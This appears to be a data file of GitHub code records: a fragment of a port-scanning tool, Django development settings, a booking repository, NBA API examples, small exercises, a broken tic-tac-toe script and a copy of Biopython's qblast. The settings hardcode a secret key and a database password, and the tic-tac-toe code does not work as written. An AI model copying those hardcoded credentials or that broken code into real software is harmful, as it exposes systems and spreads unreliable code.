socket.getservbyport(int(i))\n except socket.error:\n servername = \"TCP\"\n except OSError:\n servername = \"TCP\"\n print(gr+\"\\t[\"+wi+str(loop)+gr+\"] \"+yl+ip+wi+\":\"+gr+str(i)+wi+\"/\"+cy+servername+wi+\" STATUS:[ \"+gr+\"OPEN\"+wi+\" ]\")\n loop+=1\n exit(1)\n\n else:\n msgerror()\n else:\n\n print(parse.usage)\n exit(1)\n\nif __name__==\"__main__\":\n main()\n#'='!!\n","repo_name":"M1ndo/TheEye","sub_path":"TheEye.py","file_name":"TheEye.py","file_ext":"py","file_size_in_byte":22774,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"16145774936","text":"\ndef collatz(x):\n while x > 1:\n if x % 2 == 0:\n x = x // 2\n else:\n x = 3 * x + 1\n yield x\n\n\ndef test_last_digits():\n\n mapping = {}\n tail_edge_hist = ub.ddict(lambda: 0)\n\n for x in ub.ProgIter(range(1, int(1e5))):\n import ubelt as ub\n for y in collatz(x):\n if x in mapping:\n break\n x_tail = x - (10 * (x // 10))\n y_tail = y - (10 * (y // 10))\n mapping[x] = y\n tail_edge_hist[(str(x_tail), str(y_tail))] += 1\n x = y\n\n import kwarray\n print(kwarray.stats_dict(np.array(list(tail_edge_hist.values()))))\n\n import networkx as nx\n tail_g = nx.DiGraph()\n tail_g.add_edges_from(tail_edge_hist.keys())\n\n for cycle in nx.simple_cycles(tail_g):\n print('cycle = {!r}'.format(cycle))\n\n\n print('tail_g.adj = {!r}'.format(tail_g.adj))\n\n for n in sorted(tail_g.nodes, key=int):\n pred = tuple(tail_g.pred[n].keys())\n succ = tuple(tail_g.succ[n].keys())\n in_d = tail_g.in_degree(n)\n out_d = tail_g.out_degree(n)\n print(f'{str(pred):>15} -> {n:>2} -> {str(succ):<15} : {out_d:<2} {in_d:<2}')\n\n import kwplot\n import graphid\n plt = kwplot.autoplt()\n sccs = list(nx.strongly_connected_components(tail_g))\n nx.draw_networkx(tail_g)\n # nx.draw_circular(tail_g)\n\n ax = plt.gca()\n ax.cla()\n # nx.draw_networkx(tail_g)\n graphid.util.util_graphviz.show_nx(tail_g)\n\n\n CCs = list(nx.connected_components(tail_g.to_undirected()))\n\n","repo_name":"Erotemic/misc","sub_path":"learn/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"83"} 
+{"seq_id":"7387780622","text":"from db.run_sql import run_sql\n\nfrom models.customer import Customer\nfrom models.session import Session\nfrom models.booking import Booking\n\nimport repositories.customer_repository as customer_repository\nimport repositories.session_repository as session_repository\n\n# Save a new booking\ndef save(booking):\n sql = 'INSERT INTO bookings(customer_id, session_id) VALUES ( %s, %s) RETURNING id'\n values = [booking.customer.id, booking.session.id]\n results = run_sql( sql, values)\n booking.id = results[0]['id']\n return booking\n\n# Selects all bookings\ndef select_all():\n bookings = []\n sql = 'SELECT * FROM bookings'\n results = run_sql(sql)\n for row in results:\n customer = customer_repository.select(row['customer_id'])\n session = session_repository.select(row['session_id'])\n booking = Booking(customer, session, row['id'])\n bookings.append(booking)\n return bookings\n\n# Selects a singular booking based on booking id\ndef select(id):\n booking = None\n sql = 'SELECT * FROM bookings WHERE id = %s'\n values = [id]\n result = run_sql(sql, values)[0]\n if result != None:\n booking = Booking(result['customer'], result['session'], result['id'])\n return booking\n\n# Delete all bookings, currently only used by console.py\ndef delete_all():\n sql = 'DELETE FROM bookings'\n run_sql(sql)\n\n# Delete one booking\ndef delete(id):\n sql = 'DELETE FROM bookings WHERE id = %s'\n values = [id]\n run_sql(sql, values)\n\ndef duplicate_check(new_booking):\n bookings = select_all()\n for booking in bookings:\n if booking.customer.id == new_booking.customer.id and booking.session.id == new_booking.session.id: \n return True\n return False","repo_name":"MozzBuilds/Resistance-Temple","sub_path":"repositories/booking_repository.py","file_name":"booking_repository.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"28129423742","text":"# Local server settings - unsuitable for production. Use these settings\n# when you are testing on your personal computer and are making rapid,\n# potentially fatal changes and testing new ideas. This is optimized to run\n# in a Qiime 1.90 virtual machine with a Redis message queue setup in the host\n# machine and a local installation of mysql with the microbiome database\n\nfrom vzb.settings.base import *\n\n# SECURITY WARNING: keep the secret key used in production secret! It's okay\n# here for now\nSECRET_KEY = 'k&9nph7dp%1v1_e0t@()=fbs*vl2*i0=r2hdt-m)c#&nt2^yh*'\n\n# I want to see debug messages when developing stuff on my computer. Turning the\n# flag to False requires you to setup the static files path and media path.\n# Maybe keep it like this until you know what you're doing.\nDEBUG = True\n\n# Allowed hosts can be empty since we're only serving locally to our computer\nALLOWED_HOSTS = []\n\n# Log to console for local servers, easier to immediately see errors\nLOGGING = {\n 'version': 1,\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n }\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n }\n }\n}\n\n# Use sqlite3 since it's easier to refresh and manage if problem occurs\n# database should be located at visibiome/db.sqlite3\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'db.sqlite3',\n 'USER': '',\n },\n # Microbiome Database configuration. 
This database is not handled by\n # Django due to legacy reasons so no engine configuration needed.\n 'microbiome': {\n 'NAME': 'EarthMicroBiome',\n # Currently it's pointing to the old microbiome sevrer in an EC2\n 'HOST': 'localhost',\n 'USER': 'root',\n # Consider placing the password in an environment variable for\n # production\n 'PASSWORD': 'qiime',\n }\n}\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'local/mediafiles/')\n# Static files are handled by whitenoise and hence doesn't need Apache's\n# permissions. This reduces dependencies and configuration\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'app/static/')\n\n# The 10K matrix path. This is placed wherever you want as long as it is\n# readable by the user deploying the webserver. Assuming you are using the\n# Ubuntu VM provided by Qiime, the path should look something like below\nL_MATRIX_DATA_PATH = os.path.join(STATIC_ROOT, 'data/')\n\n# If you can host a redis on your machine, just use 127.0.0.1, else\n# use an online one. If you can setup a redis on your home machine and is\n# running a VM of Ubuntu with Qiime with VirtualBox, use 10.0.2.2\nBROKER_URL = \"redis://127.0.0.1//\"\n\n# Set maximum number of uploadable samples in asingle BIOM file\n# Set maximum number of uploadable samples in asingle BIOM file\nBRAYCURTIS_MAX_SAMPLES = 100\nAESAUNIFRAC_MAX_SAMPLES = 100\nGNATUNIFRAC_MAX_SAMPLES = 10\n","repo_name":"syaffers/visibiome","sub_path":"vzb/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22137002119","text":"import logging\nimport pynbaapi\n\n# Set up logging\nlogger = logging.getLogger(\"pynbaapi\")\nlogger.setLevel(logging.DEBUG)\nrootLogger = logging.getLogger()\nrootLogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nformatter = logging.Formatter(\n \"%(asctime)s - %(levelname)8s - %(name)s(%(thread)s) - %(message)s\"\n)\nch.setFormatter(formatter)\nrootLogger.addHandler(ch)\n\n# Initiate the NBA API object with a user-agent\nnba = pynbaapi.nba.NBA(\n f\"{pynbaapi.constants.APP_NAME} Examples/{pynbaapi.__version__.__version__}\"\n)\n\n# Get a list of basic team about all teams\n# List will contain objects with attributes:\n# team_city, team_id, team_name, team_slug, team_tricode\n# As far as I can tell, team_tricode is the same as\n# team_abbreviation in other endpoints\n# NOTE: this method retrieves the full season's schedule and extracts team info\n# so it is a bit slow the first time. 
The data is cached for subsequent calls.\nall_teams_basic_info = nba.all_teams()\n\n# Get team_id for 76ers from the list of all team basic info\n# Result: 1610612755 (int)\nsixers_id = next(x.team_id for x in all_teams_basic_info if x.team_tricode == \"PHI\")\n\n# Alternately, find the team based on abbreviation/tricode, city, or name\n# and get the id from there\n# Result: 1610612755 (int)\nsixers_id = nba.find_team(\"PHI\")[0].team_id\n\n# Get more details about the team\n# Response will be an object with the following data attributes:\n# available_seasons: list of seasons the team has played - these have an extra\n# character prefixed on them and I'm not sure what it means\n# team_info: wins, losses, division/conf name and rank, etc.\n# team_season_ranks: values per game and league ranks for ast, pts, reb, opp_pts\nsixers_details = nba.team(sixers_id)\n\n# Get history about the team\n# Response will be an object with the following data attributes:\n# awards_championships/conf/div: list of years the team won\n# background: basic info about the team including arena, dleague affiliation,\n# GM, owner, head coach, and year founded\n# history: list of city/names the team has had\n# hof_players, retired numbers, social_sites: self-explanatory lists\nsixers_history = nba.team_history(sixers_id)\n\n# Get the Sixers schedule for the 2021 season,\n# get the details of the game on 10/20/2021,\n# and extract the opponent name\nsixers_schedule = nba.schedule(season=\"2021\", team_id=sixers_id)\nsixers_game_102021 = next(\n x.games[0]\n for x in sixers_schedule.league_schedule.game_dates\n if x.game_date.startswith(\"10/20/2021\")\n)\nsixers_opponent_102021 = (\n sixers_game_102021.away_team.team_name\n if sixers_game_102021.away_team.team_id != sixers_id\n else sixers_game_102021.home_team.team_name\n)\n\n# Get a scoreboard of games from 10/24/2021\n# Response will be an object with a scoreboard attribute\n# containing a list of game objects (scoreboard.scoreboard.games)\n# Each game object contains attributes such as game_id, game_time_utc,\n# game_status, period, away_team & home_team (team objects), and team_leaders\nscoreboard = nba.scoreboard(game_date=\"2021-10-24\")\n\n# Find the Sixers game in the scoreboard,\n# extract the status and the final score\nsixers_game = next(\n x\n for x in scoreboard.scoreboard.games\n if sixers_id in [x.away_team.team_id, x.home_team.team_id]\n)\nsixers_game_status = sixers_game.game_status_text\nsixers_game_final_score = f\"{sixers_game.away_team.team_name} ({sixers_game.away_team.score}) @ ({sixers_game.home_team.score}) {sixers_game.home_team.team_name}\"\n\n# Get the boxscore summary from the Sixers game on 10/24/21\n# and get the attendance\nsixers_game_box = nba.boxscore(sixers_game.game_id)\nsixers_game_attendance = sixers_game_box.box_score_summary.attendance\n\n# Get the play-by-play data for the Sixers game on 10/24/21\n# and get the total count of fouls for each team\nsixers_game_pbp = nba.play_by_play(sixers_game.game_id)\nsixers_game_sixers_fouls = sum(\n 1\n for x in sixers_game_pbp.game.actions\n if x.action_type == \"Foul\" and x.team_tricode == \"PHI\"\n)\nsixers_game_thunder_fouls = sum(\n 1\n for x in sixers_game_pbp.game.actions\n if x.action_type == \"Foul\" and x.team_tricode == \"OKC\"\n)\n","repo_name":"toddrob99/pynbaapi","sub_path":"examples/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} 
+{"seq_id":"45388296797","text":"def stup(arr,i,j):\n n=len(arr)\n if(i<0 or i>=n):\n return\n if(j<0 or j>=n):\n return\n if(arr[i][j]==0):\n return\n if(arr[i][j]==1):\n return \n arr[i][j]=1\n stup(arr,i,j-1)\n stup(arr,i,j+1)\n stup(arr,i-1,j)\n stup(arr,i+1,j)\n \n \n(n,b)=map(int,input().split(\" \"))\n(i,j)=map(int,input().split(\" \"))\nl=[]\nfor k in range(0,b):\n t=map(int,input().split(\" \"))\n l.append(list(t))\nAdj=[[-1 for r in range(0,n)] for q in range(0,n)]\nfinal=[[1 for r in range(0,n)] for q in range(0,n)]\nfor t in l:\n (x,y)=t\n Adj[x-1][y-1]=0\n final[x-1][y-1]=0\nB=Adj\nstup(B,i-1,j-1)\nif(B==final):\n print(\"Y\")\nelse:\n print(\"N\")\n\n","repo_name":"bhi5hmaraj/APRG-2020","sub_path":"Assignment 3/flood_fill_solutions/BMC201919/BMC201919.py","file_name":"BMC201919.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"44495475116","text":"from rich.markdown import Markdown\nfrom textual.app import ComposeResult\nfrom textual.containers import Container, VerticalScroll\nfrom textual.screen import ModalScreen\nfrom textual.widgets import Static\n\n\nclass DebugScreen(ModalScreen):\n BINDINGS = [\n (\"escape\", \"app.pop_screen\", \"OK\"),\n ]\n\n def __init__(self, message: str | Markdown) -> None:\n super().__init__()\n self.message = message\n\n def compose(self) -> ComposeResult:\n with Container(id=\"debug_container\"):\n with VerticalScroll(id=\"debug_scroll\"):\n yield Static(\n self.message,\n id=\"debug_static\",\n )\n","repo_name":"sharkusk/tts-mutility","sub_path":"ttsmutility/screens/DebugScreen.py","file_name":"DebugScreen.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"42862451435","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\nimport datetime\r\nimport json\r\nimport itertools\r\n\r\nfrom tqdm import tqdm\r\nfrom multiprocessing import Pool\r\n\r\ncounter = 0\r\n\r\njoint_codes = {\r\n\"EW24\": \"NS1\",\r\n\"CC1\": \"NS24\",\r\n\"NE6\": \"NS24\",\r\n\"EW13\" : \"NS25\",\r\n\"EW14\": \"NS26\",\r\n\"DT15\": \"CC4\",\r\n\"STC\": \"NE16\",\r\n\"PTC\": \"NE17\"\r\n}\r\n\r\ninterchange_codes = {\r\n \"BP1\": \"NS4\",\r\n \"CC15\": \"NS17\",\r\n \"CE2\": \"NS27\",\r\n \"CC9\": \"EW8\",\r\n \"DT14\": \"EW12\",\r\n \"NE3\": \"EW16\",\r\n \"CC22\": \"EW21\",\r\n \"DT35\": \"CG1\",\r\n \"CC29\": \"NE1\",\r\n \"DT19\": \"NE4\",\r\n \"DT12\": \"NE7\",\r\n \"CC13\": \"NE12\",\r\n \"STC\": \"NE16\",\r\n \"PTC\": \"NE17\",\r\n \"DT26\": \"CC10\",\r\n \"DT9\": \"CC19\",\r\n \"DT16\": \"CE1\",\r\n \"TE2\": \"NS9\",\r\n \"TE9\": \"CC17\",\r\n \"TE11\": \"DT10\",\r\n \"TE14\": \"NS22\",\r\n \"TE17\": \"EW16\",\r\n \"TE20\": \"NS27\",\r\n \"TE31\": \"DT37\",\r\n \"FL1\": \"CC32\",\r\n \"JS1\": \"NS4\",\r\n \"JS8\": \"EW27\",\r\n \"JE5\": \"EW24-NS1\"\r\n \r\n }\r\n\r\ndef replace_jointcode(code):\r\n code = code.split('/')[0]\r\n if code in joint_codes.keys():\r\n return joint_codes[code]\r\n if code in interchange_codes.keys():\r\n return interchange_codes[code]\r\n return code\r\n \r\ndef apply_chunked_df(df):\r\n with open('train_routes_nx.json') as json_file:\r\n data = json.load(json_file)\r\n df_fin = pd.DataFrame()\r\n df_temp = pd.DataFrame()\r\n iter = data.items()\r\n for code, orig in iter:\r\n for destcode, dest in data[code].items():\r\n a, b = pairwise(dest)\r\n a.pop()\r\n pairs_len = len(b)\r\n df_temp = pd.DataFrame()\r\n data1 = 
pd.DataFrame(df.loc[(df[\"ORIGIN_PT_CODE\"] == replace_jointcode(code)) & (df[\"DESTINATION_PT_CODE\"] == replace_jointcode(destcode))])\r\n for data_row in data1.itertuples(index=False):\r\n df_data = pd.DataFrame([data_row])\r\n df_data = df_data.loc[df_data.index.repeat(pairs_len)]\r\n df_data[\"ORIGIN_PT_CODE\"] = a\r\n df_data[\"DESTINATION_PT_CODE\"] = b\r\n df_temp = df_temp.append(df_data, ignore_index=True)\r\n \r\n if len(df_temp.index) > 0:\r\n df_temp = df_temp.groupby(['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE', 'TIME_PER_HOUR']).sum()\r\n df_fin = df_fin.append(df_temp)\r\n \r\n df_fin = df_fin.groupby(['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE', 'TIME_PER_HOUR']).sum()\r\n return df_fin\r\n \r\n#http://www.racketracer.com/2016/07/06/pandas-in-parallel/\r\ndef parallelize_dataframe(df):\r\n df_split = np.array_split(df, 14)\r\n pool = Pool(14)\r\n df = pd.concat(pool.map(apply_chunked_df, df_split))\r\n pool.close()\r\n pool.join()\r\n return df\r\n\r\ndef pairwise(iterable):\r\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\r\n a, b = itertools.tee(iterable)\r\n next(b, None)\r\n return list(a), list(b)\r\n \r\n\r\nmonth = input(\"Dataset for (YYYYMM): \")\r\nweekdays = input(\"Number of weekdays: \")\r\nweekdays = int(weekdays)\r\n\r\nspecials = input(\"Number of weekends and holidays: \")\r\nspecials = int(specials)\r\n\r\nif not os.path.exists(os.path.join(os.getcwd(), \"processed_data\", month)):\r\n os.mkdir(os.path.join(os.getcwd(), \"processed_data\", month))\r\n\r\ntotal = specials + weekdays\r\n\r\n#now for orig dest\r\n\r\nin_file = os.path.join(os.getcwd(), \"..\", \"raw_data\", month, \"origin_destination_train_\" + month + \".csv\")\r\n\r\ndf = pd.read_csv(in_file)\r\n\r\n#orig dest\r\ndf['multiplier'] = df['DAY_TYPE']\r\n\r\ndf = df.replace({'ORIGIN_PT_CODE': interchange_codes, 'DESTINATION_PT_CODE': interchange_codes, 'multiplier': {'WEEKENDS/HOLIDAY': specials, 'WEEKDAY': weekdays}})\r\ndf['TOTAL_TRIPS'] = (df['TOTAL_TRIPS'] / df['multiplier']).round(0)\r\ndf = df[df['TOTAL_TRIPS'] !=0]\r\ndf = df[df['ORIGIN_PT_CODE'] != df['DESTINATION_PT_CODE']]\r\ndf1 = df.drop(columns=['multiplier'])\r\n\r\n#congestion analysis\r\n\r\n \r\ntqdm.pandas()\r\n\r\ndf_out = pd.DataFrame()\r\ndf_fin = pd.DataFrame()\r\nprint(df1.size)\r\ndf_out = parallelize_dataframe(df1)\r\n\r\n#df1.progress_apply(unpack_column, axis=1)\r\n\r\n#pack up the stragglers\r\ndf_out = df_out.groupby(['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE', 'TIME_PER_HOUR']).sum()\r\ndf_fin = df_fin.append(df_out)\r\n\r\ndf_fin = df_fin.groupby(['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE', 'TIME_PER_HOUR']).sum()\r\n\r\ndf_fin1 = pd.pivot_table(df_fin, index=['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE'], columns=[\"TIME_PER_HOUR\"], aggfunc={'TOTAL_TRIPS': np.sum})\r\n\r\ndf_fin = df_fin.groupby(['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE']).sum()\r\n\r\ndf_fin.to_csv(os.path.join(os.getcwd(), \"processed_data\", month, \"cda_nx_opt_train_\" + month + \"_summary_\" + datetime.datetime.now().strftime('%Y%m%d%H%M%S') + \".csv\"))\r\ndf_fin1.to_csv(os.path.join(os.getcwd(), \"processed_data\", month, \"cda_nx_opt_train_\" + month + \"_byhour_\" + datetime.datetime.now().strftime('%Y%m%d%H%M%S') + \".csv\"))","repo_name":"yuuka-miya/ftrl-data","sub_path":"analysis/old_code/reader_timed_mt.py","file_name":"reader_timed_mt.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} 
+{"seq_id":"13084412367","text":"from functools import cmp_to_key\n\ndef compare(a, b):\n if type(a) == int and type(b) == int:\n return a - b\n elif type(a) == list and type(b) == list:\n for x, y in zip(a,b):\n res = compare(x, y)\n if res != 0:\n return res\n return len(a) - len(b)\n elif type(a) == int:\n return compare([a], b)\n else:\n return compare(a,[b])\n \n\nlists = list(map(eval, open('inputs/data13.txt').read().strip().split()))\n\ncorrect = 0\n\nfor i in range(1, len(lists), 2):\n l = lists[i-1]\n r = lists[i]\n if compare(l, r) < 1:\n correct += 1 + i // 2 \n\nlists = lists + [[[2]]] + [[[6]]]\n\nlists.sort(key=cmp_to_key(compare))\n\nprint(\"Task 1:\", correct)\nprint(\"Task 2:\", (lists.index([[2]]) + 1) * (lists.index([[6]]) + 1))\n","repo_name":"Lyrete/adventofcode","sub_path":"2022/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32182497849","text":"board = [\"\"]*9\r\ndef draw_board(board):\r\n row_1 = \"{}|{}|{}\".format(board[0], board[1] , board[2])\r\n row_2 = \"{}|{}|{}\".format(board[3], board[4] , board[5])\r\n row_3 = \"{}|{}|{}\".format(board[6], board[7] , board[8])\r\n print(row_1+'\\\\n'+row_2+'\\\\n'+row_3)\r\ndef user_move(board , user_type):\r\n user_choice = int(input(\"Choose your space between 1-9\"))-1\r\nif board[user_choice]!=\"\":\r\n print(\"Space is taken . Try Again!\")\r\n user_move(board , user_type)\r\nelse:\r\n board[user_choice] = user_type\r\n available_space.remove(user_choice)\r\ndef comp_move(board , user_type):\r\n computer_choice = random.choice(available_space)\r\n board[computer_choice] = user_type\r\n available_space.remove(computer_choice)\r\ndef check_win(board , x_o):\r\n \r\n if board[0]==x_o and board[1]==x_o and board[2]==x_o or board[3]==x_o and board[4]==x_o and board[5]==x_o or board[6]==x_o and board[7]==x_o and board[8]==x_o or board[0]==x_o and board[3]==x_o and board[6]==x_o or board[1]==x_o and board[4]==x_o and board[7]==x_o or board[2]==x_o and board[5]==x_o and board[8]==x_o or board[0]==x_o and board[4]==x_o and board[8]==x_o or board[2]==x_o and board[4]==x_o and board[6]==x_o:\r\n play = False\r\n print(\"Hooray:{} has been\".format(x_o))\r\n else:\r\n \r\n play = True\r\n return play\r\n \r\n import random\r\n board[\"\"]*9\r\n available_space = [0, 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8]\r\n draw_board(board)\r\n play = True\r\n computer_or_friend = input(\"Would you like to play against the computer or friend ? 
(computer and friend)\") \r\n while play ==True:\r\n user_move(board , \"x\")\r\n play = check_win(board , \"x\")\r\n if play == False:\r\n continue\r\n draw_board(board)\r\n if computer_or_friend == \"F\":\r\n user_move(board , \"o\")\r\n elif computer_or_friend == \"c\":\r\n comp_move(board , \"o\")\r\n play = check_win(board , \"o\")\r\n draw_board(board)\r\nprint(\"End of the program\")\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"Udaysharma9027/Python-Programming","sub_path":"Tic Tac Toe Game.py","file_name":"Tic Tac Toe Game.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28804979418","text":"from urllib import urlencode as _urlencode\nfrom urllib2 import urlopen as _urlopen, Request as _Request\nfrom io import StringIO\n\n\nNCBI_BLAST_URL = \"https://blast.ncbi.nlm.nih.gov/Blast.cgi\"\n\ndef _as_bytes(s):\n\t\t\"\"\"Turn a (byte) string or a unicode string into a (byte) string.\"\"\"\n\t\treturn str(s)\n\n_as_string = _as_bytes\n\ndef _parse_qblast_ref_page(handle):\n\t\"\"\"Extract a tuple of RID, RTOE from the 'please wait' page (PRIVATE).\n\n\tThe NCBI FAQ pages use TOE for 'Time of Execution', so RTOE is probably\n\t'Request Time of Execution' and RID would be 'Request Identifier'.\n\t\"\"\"\n\ts = _as_string(handle.read())\n\ti = s.find(\"RID =\")\n\tif i == -1:\n\t\trid = None\n\telse:\n\t\tj = s.find(\"\\n\", i)\n\t\trid = s[i + len(\"RID =\"):j].strip()\n\n\ti = s.find(\"RTOE =\")\n\tif i == -1:\n\t\trtoe = None\n\telse:\n\t\tj = s.find(\"\\n\", i)\n\t\trtoe = s[i + len(\"RTOE =\"):j].strip()\n\n\tif not rid and not rtoe:\n\t\t# Can we reliably extract the error message from the HTML page?\n\t\t# e.g. \"Message ID#24 Error: Failed to read the Blast query:\n\t\t#\t\tNucleotide FASTA provided for protein sequence\"\n\t\t# or\t\"Message ID#32 Error: Query contains no data: Query\n\t\t#\t\tcontains no sequence data\"\n\t\t#\n\t\t# This used to occur inside a
<div class=\"error msInf\"> entry:\n\t\ti = s.find('<div class=\"error msInf\">')\n\t\tif i != -1:\n\t\t\tmsg = s[i + len('<div class=\"error msInf\">'):].strip()\n\t\t\tmsg = msg.split(\"</div>\", 1)[0].split(\"\\n\", 1)[0].strip()\n\t\t\tif msg:\n\t\t\t\traise ValueError(\"Error message from NCBI: %s\" % msg)\n\t\t# In spring 2010 the markup was like this:\n\t\ti = s.find('<p class=\"error\">')\n\t\tif i != -1:\n\t\t\tmsg = s[i + len('<p class=\"error\">'):].strip()\n\t\t\tmsg = msg.split(\"</p>
\", 1)[0].split(\"\\n\", 1)[0].strip()\n\t\t\tif msg:\n\t\t\t\traise ValueError(\"Error message from NCBI: %s\" % msg)\n\t\t# Generic search based on the way the error messages start:\n\t\ti = s.find('Message ID#')\n\t\tif i != -1:\n\t\t\t# Break the message at the first HTML tag\n\t\t\tmsg = s[i:].split(\"<\", 1)[0].split(\"\\n\", 1)[0].strip()\n\t\t\traise ValueError(\"Error message from NCBI: %s\" % msg)\n\t\t# We didn't recognise the error layout :(\n\t\t# print s\n\t\traise ValueError(\"No RID and no RTOE found in the 'please wait' page, \"\n\t\t\t\t\t\t \"there was probably an error in your request but we \"\n\t\t\t\t\t\t \"could not extract a helpful error message.\")\n\telif not rid:\n\t\t# Can this happen?\n\t\traise ValueError(\"No RID found in the 'please wait' page.\"\n\t\t\t\t\t\t \" (although RTOE = %s)\" % repr(rtoe))\n\telif not rtoe:\n\t\t# Can this happen?\n\t\traise ValueError(\"No RTOE found in the 'please wait' page.\"\n\t\t\t\t\t\t \" (although RID = %s)\" % repr(rid))\n\n\ttry:\n\t\treturn rid, int(rtoe)\n\texcept ValueError:\n\t\traise ValueError(\"A non-integer RTOE found in \"\n\t\t\t\t\t\t \"the 'please wait' page, %s\" % repr(rtoe))\n\ndef qblast(program, database, sequence, url_base=NCBI_BLAST_URL,\n\t\t\tauto_format=None, composition_based_statistics=None,\n\t\t\tdb_genetic_code=None, endpoints=None, entrez_query='(none)',\n\t\t\texpect=10.0, filter=None, gapcosts=None, genetic_code=None,\n\t\t\thitlist_size=50, i_thresh=None, layout=None, lcase_mask=None,\n\t\t\tmatrix_name=None, nucl_penalty=None, nucl_reward=None,\n\t\t\tother_advanced=None, perc_ident=None, phi_pattern=None,\n\t\t\tquery_file=None, query_believe_defline=None, query_from=None,\n\t\t\tquery_to=None, searchsp_eff=None, service=None, threshold=None,\n\t\t\tungapped_alignment=None, word_size=None,\n\t\t\talignments=500, alignment_view=None, descriptions=500,\n\t\t\tentrez_links_new_window=None, expect_low=None, expect_high=None,\n\t\t\tformat_entrez_query=None, format_object=None, format_type='XML',\n\t\t\tncbi_gi=None, results_file=None, show_overview=None, megablast=None,\n\t\t\t):\n\t\n\timport time\n\tassert program in ['blastn', 'blastp', 'blastx', 'tblastn', 'tblastx']\n\n\tparameters = [\n\t\t('AUTO_FORMAT', auto_format),\n\t\t('COMPOSITION_BASED_STATISTICS', composition_based_statistics),\n\t\t('DATABASE', database),\n\t\t('DB_GENETIC_CODE', db_genetic_code),\n\t\t('ENDPOINTS', endpoints),\n\t\t('ENTREZ_QUERY', entrez_query),\n\t\t('EXPECT', expect),\n\t\t('FILTER', filter),\n\t\t('GAPCOSTS', gapcosts),\n\t\t('GENETIC_CODE', genetic_code),\n\t\t('HITLIST_SIZE', hitlist_size),\n\t\t('I_THRESH', i_thresh),\n\t\t('LAYOUT', layout),\n\t\t('LCASE_MASK', lcase_mask),\n\t\t('MEGABLAST', megablast),\n\t\t('MATRIX_NAME', matrix_name),\n\t\t('NUCL_PENALTY', nucl_penalty),\n\t\t('NUCL_REWARD', nucl_reward),\n\t\t('OTHER_ADVANCED', other_advanced),\n\t\t('PERC_IDENT', perc_ident),\n\t\t('PHI_PATTERN', phi_pattern),\n\t\t('PROGRAM', program),\n\t\t# ('PSSM',pssm), - It is possible to use PSI-BLAST via this API?\n\t\t('QUERY', sequence),\n\t\t('QUERY_FILE', query_file),\n\t\t('QUERY_BELIEVE_DEFLINE', query_believe_defline),\n\t\t('QUERY_FROM', query_from),\n\t\t('QUERY_TO', query_to),\n\t\t# ('RESULTS_FILE',...), - Can we use this parameter?\n\t\t('SEARCHSP_EFF', searchsp_eff),\n\t\t('SERVICE', service),\n\t\t('THRESHOLD', threshold),\n\t\t('UNGAPPED_ALIGNMENT', ungapped_alignment),\n\t\t('WORD_SIZE', word_size),\n\t\t('CMD', 'Put'),\n\t\t]\n\t\t\n\tquery = [x for x in parameters if x[1] is not 
